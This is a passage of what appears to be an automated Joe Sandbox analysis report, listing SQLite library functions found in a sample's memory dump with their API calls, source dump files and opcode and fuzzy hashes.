                                                                                                  • API ID: sqlite3_stricmp
                                                                                                  • String ID: sqlite_master$sqlite_temp_master
                                                                                                  • API String ID: 912767213-3047539776
                                                                                                  • Opcode ID: 4c0b5e05171b25bd5c8c41a7657e3b35beea98c251ddc3f6dc19ad54fe281cd0
                                                                                                  • Instruction ID: 63e5fdf81255ab490a43bc1fd920fc9bd3308e39a872e70571490c1741ade3c5
                                                                                                  • Opcode Fuzzy Hash: 4c0b5e05171b25bd5c8c41a7657e3b35beea98c251ddc3f6dc19ad54fe281cd0
                                                                                                  • Instruction Fuzzy Hash: F11186B1A042564FA700DFEDC880A6BBBF4FF88349B248869DC24DB301D770D86187A1
                                                                                                  Function 61E1FDD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FDEA
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E1FDF6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                  • String ID:
                                                                                                  • API String ID: 3265351223-3916222277
                                                                                                  • Opcode ID: 6ec5ce44d5253905c2c31cf82c133df3ade1bc034555c8277db2cc6235a6bdb5
                                                                                                  • Instruction ID: 63217b8f89530472a62f3d5d7cc458b089106788c8699f665afed08dbc9a9bca
                                                                                                  • Opcode Fuzzy Hash: 6ec5ce44d5253905c2c31cf82c133df3ade1bc034555c8277db2cc6235a6bdb5
                                                                                                  • Instruction Fuzzy Hash: 69118E70A0C6858BDF059FA8D4C626A7BF0EF09718F20809CD894CB20AD735C9A4C7D2
                                                                                                  Function 61E1FD5F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FD78
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E1FD84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                  • String ID:
                                                                                                  • API String ID: 3265351223-3916222277
                                                                                                  • Opcode ID: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                                  • Instruction ID: b8dd018c396515ff4c3532d21d0c6555bd80bc1fee657137dd656ffe0325eb02
                                                                                                  • Opcode Fuzzy Hash: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                                  • Instruction Fuzzy Hash: 2F018C319087058BDB049FB8D4C526A7BF4FF06324F60C99ED8A48B288D735C8558BC2
                                                                                                  Function 61E18096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32 ref: 61E180C2
                                                                                                  • sqlite3_win32_sleep.SQLITE3 ref: 61E180E9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalInitializeSectionsqlite3_win32_sleep
                                                                                                  • String ID: Pza
                                                                                                  • API String ID: 3721583994-636368962
                                                                                                  • Opcode ID: d0c9f188730823a9f55494393326fdc8d66ec006910e851234e666412a7034cd
                                                                                                  • Instruction ID: 4895e9625580ef35b3d681d80aba2ed69c19cb8abeac30834b1334978d77a15b
                                                                                                  • Opcode Fuzzy Hash: d0c9f188730823a9f55494393326fdc8d66ec006910e851234e666412a7034cd
                                                                                                  • Instruction Fuzzy Hash: 91F0A07085D70C9FFB019AA8C842B8F77E8EB4A328F208439C54457304D3BAD4C9ABD2
                                                                                                  Function 61E3712B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E37132
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_str_vappendf.SQLITE3 ref: 61E3717D
                                                                                                    • Part of subcall function 61E23995: sqlite3_str_append.SQLITE3 ref: 61E23A0E
                                                                                                    • Part of subcall function 61E23995: sqlite3_str_append.SQLITE3 ref: 61E23A45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_str_append$sqlite3_configsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_str_vappendf
                                                                                                  • String ID: F
                                                                                                  • API String ID: 4014417345-1304234792
                                                                                                  • Opcode ID: 8e4caad9e01c82348ea18a58a99aa589e2c376b0cab159a0dbae7a068b8f84d8
                                                                                                  • Instruction ID: a03db343b3bdc543cc5da2348e9ec7ab375dc736fffa3361db5bd384c07bbee2
                                                                                                  • Opcode Fuzzy Hash: 8e4caad9e01c82348ea18a58a99aa589e2c376b0cab159a0dbae7a068b8f84d8
                                                                                                  • Instruction Fuzzy Hash: 81F0F4B0D0438A9BDB00DFA8C59478EBBF6AB55348F24C429D8489F304E736D548CB82